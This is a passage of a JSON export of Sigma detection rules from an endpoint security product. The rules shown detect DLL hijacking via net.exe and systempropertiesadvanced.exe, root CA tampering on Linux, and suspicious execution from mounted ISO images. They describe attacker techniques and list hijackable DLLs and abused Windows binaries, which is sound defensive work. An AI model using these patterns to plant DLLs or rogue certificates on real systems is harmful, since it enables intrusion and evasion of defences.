"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_net.yml",
"content": "title: DLL Hijacking via net.exe\nid: c6ae380a-a730-47c7-8fba-c5056f4a8cd7\ndescription: |\n Detects potential Windows DLL Hijacking via net.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'net.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\IPHLPAPI.DLL'\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c6ae380a-a730-47c7-8fba-c5056f4a8cd7",
"rule_name": "DLL Hijacking via net.exe",
"rule_description": "Detects potential Windows DLL Hijacking via net.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c6d53bd7-50c9-4a1a-966d-fecf54bfe22e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097880Z",
"creation_date": "2026-03-23T11:45:34.097882Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097886Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_systempropertiesadvanced.yml",
"content": "title: DLL Hijacking via systempropertiesadvanced.exe\nid: c6d53bd7-50c9-4a1a-966d-fecf54bfe22e\ndescription: |\n Detects potential Windows DLL Hijacking via systempropertiesadvanced.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'systempropertiesadvanced.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\credui.dll'\n - '\\DNSAPI.dll'\n - '\\DSROLE.DLL'\n - '\\LOGONCLI.DLL'\n - '\\netid.dll'\n - '\\NETUTILS.DLL'\n - '\\SRVCLI.DLL'\n - '\\WINBRAND.dll'\n - '\\WINSTA.dll'\n - '\\WKSCLI.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: 
selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c6d53bd7-50c9-4a1a-966d-fecf54bfe22e",
"rule_name": "DLL Hijacking via systempropertiesadvanced.exe",
"rule_description": "Detects potential Windows DLL Hijacking via systempropertiesadvanced.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c6de2835-4ba4-463b-9ed3-eddc36d302c6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.500257Z",
"creation_date": "2026-03-23T11:45:35.296996Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297000Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md",
"https://attack.mitre.org/techniques/T1553/004/"
],
"name": "t1553_004_root_ca_certificate_tampered_linux.yml",
"content": "title: Root Certificate Authority Tampered\nid: c6de2835-4ba4-463b-9ed3-eddc36d302c6\ndescription: |\n Detects an attempt at tampering the Root CA (Certificate Authority) of the machine.\n Attackers may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n Root certificates are used in public key cryptography to identify a root certificate authority (CA).\n When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.\n Certificates are commonly used for establishing secure TLS/SSL communications within a web browser.\n When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk.\n Depending on the security settings, the browser may not allow the user to establish a connection to the website.\n Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system.\n It is recommended to ensure a system administrator requested the installation of those root certificates and that they haven't been tampered with.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md\n - https://attack.mitre.org/techniques/T1553/004/\ndate: 2023/12/15\nmodified: 2026/03/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.004\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.ImpairDefenses\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.SystemModification\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_write:\n Kind: 'access'\n Permissions: 'write'\n Path|startswith:\n - '/etc/ca-certificates/'\n - '/etc/ca-certificates.conf'\n - '/etc/pki/ca-trust/' # CentOS/RHEL\n - 
'/usr/local/share/ca-certificates/' # Debian/Ubuntu\n - '/usr/share/ca-certificates/' # Debian/Ubuntu\n ProcessParentImage|contains: '?'\n\n selection_misc:\n Kind:\n - 'symlink'\n - 'hardlink'\n Path|startswith:\n - '/etc/ca-certificates/'\n - '/etc/ca-certificates.conf'\n - '/etc/pki/ca-trust/' # CentOS/RHEL\n - '/usr/local/share/ca-certificates/' # Debian/Ubuntu\n - '/usr/share/ca-certificates/' # Debian/Ubuntu\n ProcessParentImage|contains: '?'\n\n selection_rename:\n Kind: 'rename'\n TargetPath|startswith:\n - '/etc/ca-certificates/'\n - '/etc/ca-certificates.conf'\n - '/etc/pki/ca-trust/' # CentOS/RHEL\n - '/usr/local/share/ca-certificates/' # Debian/Ubuntu\n - '/usr/share/ca-certificates/' # Debian/Ubuntu\n ProcessParentImage|contains: '?'\n\n exclusion_common:\n ProcessImage:\n - '/usr/lib/systemd/systemd'\n - '/usr/bin/pacman'\n - '/sbin/apk'\n - '/usr/sbin/apk'\n - '/usr/bin/tar'\n\n # Package Managers\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - 
ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n - ProcessImage:\n - '/usr/bin/tdnf'\n - '/usr/bin/dnf5'\n - ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf-automatic'\n - '/usr/bin/python* /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf'\n - '/usr/bin/python* /usr/bin/dnf'\n - 'dnf update'\n - 'dnf upgrade'\n - 'dns install'\n exclusion_rpm:\n - ProcessImage: '/usr/bin/rpm'\n - ProcessParentImage: '/usr/bin/rpm'\n - ProcessAncestors|contains: '|/usr/bin/rpm|'\n\n exclusion_update_ca_certificates:\n - ProcessImage:\n - '/usr/bin/update-ca-certificates'\n - '/usr/sbin/update-ca-certificates'\n - '/usr/bin/update-ca-trust'\n - '/usr/sbin/update-ca-trust'\n - ProcessParentCommandLine|contains:\n - '/usr/bin/update-ca-certificates'\n - '/usr/sbin/update-ca-certificates'\n - '/usr/bin/update-ca-trust'\n - '/usr/sbin/update-ca-trust'\n - ' /bin/update-ca-trust'\n\n exclusion_ca_legacy:\n - ProcessCommandLine|startswith:\n - '/bin/sh /usr/bin/ca-legacy 
'\n - '/usr/bin/sh /usr/bin/ca-legacy '\n - ProcessParentCommandLine|startswith:\n - '/bin/sh /usr/bin/ca-legacy '\n - '/usr/bin/sh /usr/bin/ca-legacy '\n\n exclusion_snapd:\n ProcessImage:\n - '/usr/lib/snapd/snap-update-ns'\n - '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - '/usr/bin/containerd-shim-runc-v2'\n - '/nix/store/*-docker-containerd-*/bin/containerd'\n - ProcessParentImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - '/usr/bin/containerd-shim-runc-v2'\n - ProcessGrandparentImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - '/usr/bin/containerd-shim-runc-v2'\n - ProcessAncestors|contains:\n - '|/usr/bin/dockerd|'\n - '|/usr/sbin/dockerd|'\n - '|/usr/local/bin/dockerd|'\n - '|/usr/local/bin/docker-init|'\n - '|/usr/bin/dockerd-current|'\n 
- '|/usr/sbin/dockerd-current|'\n - '|/usr/bin/containerd|'\n - '|/usr/local/bin/containerd|'\n - '|/var/lib/rancher/k3s/data/*/bin/containerd|'\n - '|/var/lib/rancher/rke2/data/*/bin/containerd|'\n - '|/snap/docker/*/bin/dockerd|'\n - '|/snap/microk8s/*/bin/containerd|'\n - '|/usr/bin/dockerd-ce|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_trust:\n ProcessImage: '/usr/bin/trust'\n\n exclusion_eset:\n ProcessImage: '/opt/eset/e??/lib/execd'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_kaniko:\n ProcessImage: '/kaniko/executor'\n\n exclusion_rsync:\n ProcessImage: '/usr/bin/rsync'\n\n exclusion_netdata:\n ProcessCommandLine: 'tar xpvf -'\n ProcessParentCommandLine|startswith: 'sh /tmp/netdata-updater-'\n\n exclusion_podman:\n - ProcessImage: '/usr/bin/podman'\n - ProcessParentImage: '/usr/bin/podman'\n - ProcessAncestors|contains: '|/usr/bin/podman|'\n\n exclusion_konea:\n # /opt/quest/kace/bin/konea\n # /data/quest/kace/bin/konea\n ProcessParentImage|endswith: '/quest/kace/bin/konea'\n\n exclusion_puppet:\n - ProcessImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_kace:\n ProcessImage: '/var/quest/kace/modules/clientidentifier/clientidentifier'\n\n exclusion_ubiquity:\n ProcessCommandLine: '/sbin/init maybe-ubiquity'\n\n exclusion_steam_pressure_vessel:\n ProcessImage|endswith: '/steam-runtime-sniper/pressure-vessel/bin/pressure-vessel-wrap'\n\n exclusion_bitdefender:\n ProcessImage: 
'/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_earthly:\n Path|endswith: \"/.apk.????????????????????????????????????????????????\"\n ProcessImage: '/usr/bin/qemu-aarch64-static'\n ProcessParentImage: '/usr/bin/earth_debugger'\n ProcessGrandparentImage: '/usr/bin/buildkit-runc'\n ProcessGrandparentCommandLine|contains: ' /tmp/earthly/buildkit/'\n\n exclusion_crio:\n ProcessImage: '/usr/bin/crio'\n\n exclusion_mitel:\n - ProcessParentCommandLine: '/bin/bash /home/scripts_m7450/cert_os.sh'\n - ProcessGrandparentCommandLine: '/bin/sh /etc/init.d/m7450 start'\n\n # template_exclusion_ansible\n\n exclusion_reconfigure:\n ProcessCommandLine:\n - '/usr/bin/python3 /usr/bin/reconfigure'\n - '/usr/bin/python3 /usr/bin/reconfigure -a'\n\n exclusion_katello1:\n ProcessCommandLine: 'cp /etc/rhsm/ca/katello-server-ca.pem /etc/pki/ca-trust/source/anchors'\n ProcessParentCommandLine: '/bin/bash /usr/bin/katello-rhsm-consumer'\n Path: '/etc/pki/ca-trust/source/anchors/katello-server-ca.pem'\n\n exclusion_katello2:\n ProcessImage: '/usr/bin/ln'\n ProcessGrandparentCommandLine: '/bin/bash /usr/bin/katello-rhsm-consumer'\n\n exclusion_qemu:\n ProcessImage: '/usr/bin/qemu-*-static'\n ProcessParentImage: '/usr/bin/qemu-*-static'\n\n exclusion_google_agent:\n ProcessImage: '/usr/bin/google_guest_agent'\n\n exclusion_salt:\n ProcessParentCommandLine:\n - '/usr/bin/python /usr/bin/salt-master'\n - '/usr/bin/python3 /usr/bin/salt-master'\n - '/usr/libexec/platform-python /usr/bin/salt-master*'\n - '/usr/libexec/platform-python /usr/bin/salt-minion*'\n - '/usr/libexec/platform-python /usr/bin/salt-call*'\n - '/usr/lib/venv-salt-minion/bin/python.original /usr/lib/venv-salt-minion/bin/salt-minion*'\n - '/usr/bin/python3 /var/tmp/.root_??????_salt/salt-call *'\n\n exclusion_zscaler:\n ProcessImage: '/opt/zscaler/bin/zsaservice'\n\n exclusion_coreutils:\n ProcessImage: '/usr/bin/coreutils'\n\n exclusion_forticlient:\n ProcessImage: '/opt/forticlient/webfilter'\n Path|endswith: 
'FortiClient_WEBFILTER_CA.crt'\n exclusion_forticlient2:\n ProcessParentImage: '/opt/forticlient/fctsched'\n Path|endswith: 'FortiClient_WEBFILTER_CA.crt'\n\n exclusion_landscape:\n ProcessGrandparentCommandLine:\n - '/usr/bin/python3 /usr/bin/landscape-manager --ignore-sigint'\n - '/usr/bin/python3 /usr/bin/landscape-manager --ignore-sigint --quiet'\n\n exclusion_forge_cli:\n ProcessCommandLine: './forge-cli ca install'\n\n # https://github.com/canonical/landscape-client/blob/main/scripts/landscape-manager\n exclusion_landscape_manager:\n ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python3 /usr/bin/landscape-manager'\n - '/usr/bin/python /usr/bin/landscape-manager'\n\n exclusion_conmon_docker:\n ProcessGrandparentCommandLine|contains|all:\n - '/usr/bin/conmon'\n - '-b /store/docker-data/engine/overlay-containers'\n\n exclusion_cfagent:\n ProcessImage: '/usr/sbin/cfagent'\n\n exclusion_keytool:\n ProcessImage: '/usr/lib/jvm/java-*/jre/bin/keytool'\n\n exclusion_backup:\n ProcessImage:\n - '/bin/cp'\n - '/usr/bin/cp'\n ProcessCurrentDirectory|startswith: '/var/backups/'\n\n exclusion_temp_file:\n - ProcessImage:\n - '/usr/bin/vi'\n - '/usr/bin/vim'\n - '/usr/bin/vim.basic'\n Path|endswith:\n - '.swp'\n - '.swx'\n - ProcessImage: '/usr/bin/sed'\n Path: '/usr/bin/sed??????'\n - ProcessImage: '/usr/bin/sed'\n TargetPath: '/usr/bin/sed??????'\n\n exclusion_buildah:\n ProcessImage: '/usr/bin/buildah'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c6de2835-4ba4-463b-9ed3-eddc36d302c6",
"rule_name": "Root Certificate Authority Tampered",
"rule_description": "Detects an attempt at tampering with the Root CA (Certificate Authority) of the machine.\nAttackers may install a root certificate on a compromised system to avoid warnings when connecting to adversary-controlled web servers.\nRoot certificates are used in public key cryptography to identify a root certificate authority (CA).\nWhen a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.\nCertificates are commonly used for establishing secure TLS/SSL communications within a web browser.\nWhen a user attempts to browse a website that presents a certificate that is not trusted, an error message will be displayed to warn the user of the security risk.\nDepending on the security settings, the browser may not allow the user to establish a connection to the website.\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system.\nIt is recommended to ensure that a system administrator requested the installation of those root certificates and that they haven't been tampered with.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-03-20",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c6f160ff-aaca-449a-ac1c-ad35b1e9d1c5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622347Z",
"creation_date": "2026-03-23T11:45:34.622349Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622353Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/",
"https://attack.mitre.org/techniques/T1204/",
"https://attack.mitre.org/techniques/T1059/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1204_suspicious_execution_from_iso.yml",
"content": "title: Suspicious Execution from ISO File\nid: c6f160ff-aaca-449a-ac1c-ad35b1e9d1c5\ndescription: |\n Detects a suspicious execution from a mounted device.\n It is often the result of a spearphishing attack via disk image file (like ISO or IMG) containing malicious link.\n Attackers may abuse it to gain execution and to avoid detection.\n It is recommended to check the executed binary for malicious behavior or content.\nreferences:\n - https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/\n - https://attack.mitre.org/techniques/T1204/\n - https://attack.mitre.org/techniques/T1059/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/02/14\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204\n - attack.t1059\n - attack.defense_evasion\n - attack.t1218\n - attack.t1553.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.USB\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Phishing\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|startswith: 'C:\\'\n Image|endswith:\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\wscript.exe'\n - '\\cscript.exe'\n - '\\regsvr32.exe'\n - '\\mshta.exe'\n - '\\rundll32.exe'\n ParentImage: '?:\\Windows\\explorer.exe'\n # Malicious files are most of the time at the root of the disk image\n CurrentDirectory: '?:\\'\n\n # Detects binaries executed from the root of a disk image that are not signed\n selection_execution:\n CurrentDirectory: '?:\\'\n Signed: 'false'\n\n filter_depth:\n Image: '?:\\\\*\\\\*'\n\n # Avoid detection if the mounted device is related to a network drive\n filter_network:\n Image|startswith: '\\\\\\\\'\n\n filter_directory:\n CurrentDirectory:\n - 'C:\\'\n # Drive D are often use for CD-Rom drive\n - 'D:\\'\n\n exclusion_shell:\n CommandLine:\n - '?:\\Windows\\System32\\cmd.exe'\n - 
'?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n\n exclusion_commandline:\n CommandLine|startswith:\n - '?:\\WINDOWS\\system32\\rundll32.exe cryptext.dll,CryptExtOpenCER '\n - '?:\\WINDOWS\\system32\\rundll32.exe cryptext.dll,CryptExtAddPFX '\n - '?:\\windows\\System32\\rundll32.exe ?:\\Program Files\\Windows Photo Viewer\\PhotoViewer.dll, ImageView_Fullscreen '\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\Program Files\\'\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\Program Files (x86)\\'\n - '?:\\WINDOWS\\system32\\cmd.exe /c \\\\\\\\'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_device_harddiskvolume:\n Image|startswith: '\\Device\\HarddiskVolume'\n\n exclusion_ezdicom:\n - Image: '?:\\Launcher.exe'\n ProcessSha256: 'c450dd35228ca0e8d7d2d58add694d78a0403d4a3fadbfddbb0a01efa9899fc6'\n - Image:\n - '?:\\Ez-DicomCDViewer.exe'\n - '?:\\Ez-DicomCDViewer-??.exe'\n - '?:\\EzDicomCDViewerMPR.exe'\n\n exclusion_scanvisu:\n Image: '?:\\DEPART.EXE'\n Product: \"Lanceur de l'application SCANVISU (Scan+)\"\n\n exclusion_acetiam:\n Image: '?:\\CDStart.exe'\n Product: 'ACETIAM Viewer Lite'\n\n exclusion_etiam:\n Image: '?:\\START.EXE'\n Product: 'Start Etiam CD'\n\n exclusion_ondemand3d:\n Image: '?:\\CDViewer.exe'\n Product: 'OnDemand3DApp'\n\n condition: (selection or (selection_execution and not filter_depth and not filter_network)) and not filter_directory and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c6f160ff-aaca-449a-ac1c-ad35b1e9d1c5",
"rule_name": "Suspicious Execution from ISO File",
